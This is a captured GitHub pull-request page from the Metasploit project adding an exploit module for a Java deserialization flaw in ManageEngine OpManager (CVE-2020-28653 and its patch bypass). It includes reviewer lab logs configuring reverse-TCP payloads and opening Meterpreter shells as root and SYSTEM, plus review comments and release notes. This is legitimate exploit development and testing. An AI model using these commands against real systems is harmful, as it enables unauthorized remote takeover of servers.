$('div.sliderClosebtTxt').html('webclient.loginpage.show.ad'); $.ajax({ url: "/LoginPage.do", //No I18N data: "ShowAds=false", cache: false, success: function(response) { } }); } else { $("#opmDftLogo1").hide(); $("#folio_block").show(); $('.loginPaging').show(); $('div.sliderClosebt.selected').removeClass('selected');//No I18N //$('div.sliderClosebt').addClass('sliderClosebt'); $('div.sliderClosebtTxt').html('webclient.loginpage.close.ad'); //clearInterval(play); //Stop the rotation //rotate(); //Trigger rotation immediately //rotateSwitch(); // Resume rotation $.ajax({ url: "/LoginPage.do", //No I18N data: "ShowAds=true", cache: false, success: function(response) { } }); } } //Start Slider loading JS function function loadSliderImage() { $("#loader").hide(); $(".loginPaging").show(); $(".loginPaging a:first").addClass("active"); var imageWidth = $(".window1").width(); var imageSum = $(".image_reel img").size(); var imageReelWidth = imageWidth * imageSum; $(".image_reel").css({'width' : imageReelWidth}); //Paging + Slider Function rotate = function(){ var triggerID = $active.attr("rel") - 1; //Get number of times to slide var image_reelPosition = triggerID * imageWidth; //Determines the distance the image reel needs to slide $(".loginPaging a").removeClass('active'); //Remove all active class $active.addClass('active'); //Add active class (the $active is declared in the rotateSwitch function) //Slider Animation $(".image_reel").animate({ right: -image_reelPosition }, 500 ); }; //Rotation + Timing Event rotateSwitch = function() { play = setInterval(function(){ //Set timer - this will repeat itself every 3 seconds $active = $('.loginPaging a.active').next(); if ( $active.length === 0) { //If paging reaches the end... // $active = $('.loginPaging a:first'); //go back to first } rotate(); //Trigger the paging and slider function }, 10000); //Timer speed in milliseconds (3 seconds) }; rotateSwitch(); //Run function on launch //On Hover $(".image_reel a").hover(function() { clearInterval(play); //Stop the rotation }, function() { rotateSwitch(); //Resume rotation }); //On Click $(".loginPaging a").click(function() { $active = $(this); //Activate the clicked paging //Reset Timer clearInterval(play); //Stop the rotation rotate(); //Trigger rotation immediately rotateSwitch(); // Resume rotation return false; //Prevent browser jump to link anchor }); //customize check box $(".checkBox,.checkBoxClear").click(function(srcc) { if ($(this).hasClass("checkBox")) { $(this).removeClass("checkBox"); $(this).addClass("checkBoxClear"); } else { $(this).removeClass("checkBoxClear"); $(this).addClass("checkBox"); } }); //Start Setfocus $('input:text:first').focus(); $('input:text').bind("keydown", function(e) { var n = $("input:text").length; if (e.which == 13) { //Enter key e.preventDefault(); //Skip default behavior of the enter key var nextIndex = $('input:text').index(this) + 1; if(nextIndex < n-1) { $('input:text')[nextIndex].focus(); } else { $('input:text')[nextIndex-1].blur(); $('#btnSubmit').click(); } } }); } function IeVersionCheck() { var value = { IsIE: false, TrueVersion: 0, ActingVersion: 0, CompatibilityMode: false }; //Try to find the Trident version number var trident = window.navigator.userAgent.match(/Trident\/(\d+)/); if (trident) { value.IsIE = true; //Convert from the Trident version number to the IE version number value.TrueVersion = parseInt(trident[1], 10) + 4; } //Try to find the MSIE number var msie = window.navigator.userAgent.match(/MSIE (\d+)/); if (msie) { value.IsIE = true; //Find the IE version number from the user agent string value.ActingVersion = parseInt(msie[1]); } else { //Must be IE 11 in "edge" mode value.ActingVersion = value.TrueVersion; } //If we have both a Trident and MSIE version number, see if they're different if (value.IsIE && value.TrueVersion > 0 && value.ActingVersion > 0) { //In compatibility mode if the trident number doesn't match up with the MSIE number value.CompatibilityMode = value.TrueVersion != value.ActingVersion; } return value; } //Start Browser checking for IE function doIEHandling(notSupportedIE, iscompatibilityMode) { var objref = document.getElementById('ie6_statusmsg'); //if(jQuery.browser.msie && jQuery.browser.version=="6.0") if(notSupportedIE) { //jQuery(".loginMsgBox").slideUp(400); //document.getElementById("forgotPassStatus").style.display="block"; //document.getElementById("loginHolderdisable").style.display="block"; //document.getElementById("authenticationDiv").style.display="none"; /* document.getElementById("LoginDiv").style.display="none"; var posLeft = (document.body.offsetWidth-896)/2; objref.style.left= posLeft+'px'; objref.style.top = 30+'px';*/ // objref.style.display = 'block'; // document.body.className = "" document.getElementById("form1").style.display = 'none'; document.getElementById("browserNotSupportDiv").style.display = 'block'; if(iscompatibilityMode) { $('.browserNotSupportClass').hide(); } else { $('.compatibilityModeClass').hide(); } } else { // document.getElementById("form1").style.display = 'block'; // document.getElementById("authenticationDiv").style.display="block"; // document.getElementById("forgotPassStatus").style.display="none"; $('#authenticationDiv').css({left:'0',opacity:'1'}); $('#forgotPasswordDiv').css({left:'100%',opacity:'0'}); //document.getElementById("loginHolderdisable").style.display="none"; objref.style.display = 'none'; } } // ignorei18n_end setincheckbox(); selectLocalLogin(); </script> [*] An HTTP session cookie has been issued [-] Exploit aborted due to failure: unexpected-reply: Could not identify the remote version number [*] Exploit completed, but no session was created. Version 12.5.328 on Windows Server 2019 Powershell Target msf6 > use exploit/multi/http/opmanager_sumpdu_deserialization [*] Using configured payload cmd/windows/powershell_reverse_tcp msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set rhost 192.168.140.149 rhost => 192.168.140.149 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set lhost 192.168.140.1 lhost => 192.168.140.1 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > options Module options (exploit/multi/http/opmanager_sumpdu_deserialization): Name Current Setting Required Description ---- --------------- -------- ----------- CVE Automatic yes Vulnerability to use (Accepted: Automatic, CVE-2020-28653, CVE- 2021-3287) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.140.149 yes The target host(s), see https://github.com/rapid7/metasploit-fr amework/wiki/Using-Metasploit RPORT 8060 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add resses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated ) TARGETURI / yes OpManager path URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (cmd/windows/powershell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.140.1 yes The listen address (an interface may be specified) LOAD_MODULES no A list of powershell modules separated by a comma to downloa d over the web LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows Command msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > show targets Exploit targets: Id Name -- ---- 0 Windows Command 1 Windows Dropper 2 Windows PowerShell 3 Unix Command 4 Linux Dropper 5 Python msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set target 2 target => 2 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run [*] Started reverse TCP handler on 192.168.140.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] An HTTP session cookie has been issued [*] Detected version: 12.5.328 [*] The request handler has been associated with the HTTP session [*] Sending stage (200262 bytes) to 192.168.140.149 [*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.149:49896) at 2021-09-17 16:30:28 -0500 meterpreter > getuid Server username: WIN-D4KCH4DS7I8\space meterpreter > sysinfo Computer : WIN-D4KCH4DS7I8 OS : Windows 2016+ (10.0 Build 17763). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > Sorry, something went wrong. space-r7 reviewed 19 days ago View changes documentation/modules/exploit/multi/http/opmanager_sumpdu_deserialization.md 1. Download an affected version for either Windows or Linux from the [archive][0] 1. Run the installer executable as root 1. Accept the default values for all settings (skip registration) 1. Navigate to `/opt/ManageEngine/OpManagerCentral/bin` Copy link Contributor SPACE-R7 19 DAYS AGO Looks like older Linux versions might be under the /opt/ManageEngine/OpManager/bin path, so that could be added here Sorry, something went wrong. Copy link Contributor Author ZEROSTEINER COMMENTED 17 DAYS AGO For the 12.3.295 on Windows Server 2019 which is failing because it can't identify the version number, you'll have to set it to the 2020 CVE. Unfortunately the version detection uses an aspect of the logon page that isn't present in the older versions. After the CVE option is set, it should work just fine though. 👍 1 Sorry, something went wrong. Copy link Contributor SPACE-R7 COMMENTED 16 DAYS AGO > For the 12.3.295 on Windows Server 2019 which is failing because it can't > identify the version number, you'll have to set it to the 2020 CVE. > Unfortunately the version detection uses an aspect of the logon page that > isn't present in the older versions. After the CVE option is set, it should > work just fine though. That worked great, thanks! msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > set cve CVE-2020-28653 cve => CVE-2020-28653 msf6 exploit(multi/http/opmanager_sumpdu_deserialization) > run [*] Started reverse TCP handler on 192.168.140.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] An HTTP session cookie has been issued [*] The request handler has been associated with the HTTP session [*] Using URL: http://0.0.0.0:8080/rO59AnzQl4 [*] Local IP: http://192.168.1.199:8080/rO59AnzQl4 [*] Client 192.168.140.135 (Wget/1.20.3 (linux-gnu)) requested /rO59AnzQl4 [*] Sending payload to 192.168.140.135 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (3012548 bytes) to 192.168.140.135 [*] Command Stager progress - 135.34% done (157/116 bytes) [*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.135:32826) at 2021-09-20 09:01:17 -0500 [*] Server stopped. meterpreter > getuid Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0) meterpreter > sysinfo Computer : 192.168.140.135 OS : Ubuntu 20.04 (Linux 5.11.0-34-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > Sorry, something went wrong. space-r7 added a commit that referenced this issue 16 days ago Land #15670, add opmanager sumpdu deser module Verified This commit was signed with the committer’s verified signature. space-r7 Shelby Pace GPG key ID: DE80BD86F1B96C84 Learn about vigilant mode. Loading status checks… fee037a Hide details View details space-r7 merged commit 4bccc05 into rapid7:master 16 days ago 20 checks passed Copy link Contributor SPACE-R7 COMMENTED 16 DAYS AGO Added the older path for the Linux installations and fixed a typo in 327aefd. Code looked good to me, and the module worked across a large number of versions (all that I had previously tested after leveraging the CVE option). Sorry, something went wrong. Copy link Contributor SPACE-R7 COMMENTED 16 DAYS AGO RELEASE NOTES The exploit/multi/http/opmanager_sumpdu_deserialization module implements an exploit (CVE-2020-28653) and patch bypass (CVE-2021-3287) for a Java deserialization vulnerability that exists in numerous versions of ManageEngine's OpManager software. Arbitrary code as the NT AUTHORITY\SYSTEM user on Windows or the root user on Linux is achieved by sending a PDU to the SmartUpdateManager handler. Sorry, something went wrong. Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment Reviewers space-r7 smcintyre-r7 adfoster-r7 Assignees space-r7 Labels docs module rn-modules Projects None yet Milestone No milestone Linked issues Successfully merging this pull request may close these issues. None yet 5 participants Add this suggestion to a batch that can be applied as a single commit. This suggestion is invalid because no changes were made to the code. Suggestions cannot be applied while the pull request is closed. Suggestions cannot be applied while viewing a subset of changes. Only one suggestion per line can be applied in a batch. Add this suggestion to a batch that can be applied as a single commit. Applying suggestions on deleted lines is not supported. You must change the existing code in this line in order to create a valid suggestion. Outdated suggestions cannot be applied. This suggestion has been applied or marked resolved. Suggestions cannot be applied from pending reviews. Suggestions cannot be applied on multi-line comments. * © 2021 GitHub, Inc. * Terms * Privacy * Security * Status * Docs * Contact GitHub * Pricing * API * Training * Blog * About You can’t perform that action at this time. You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.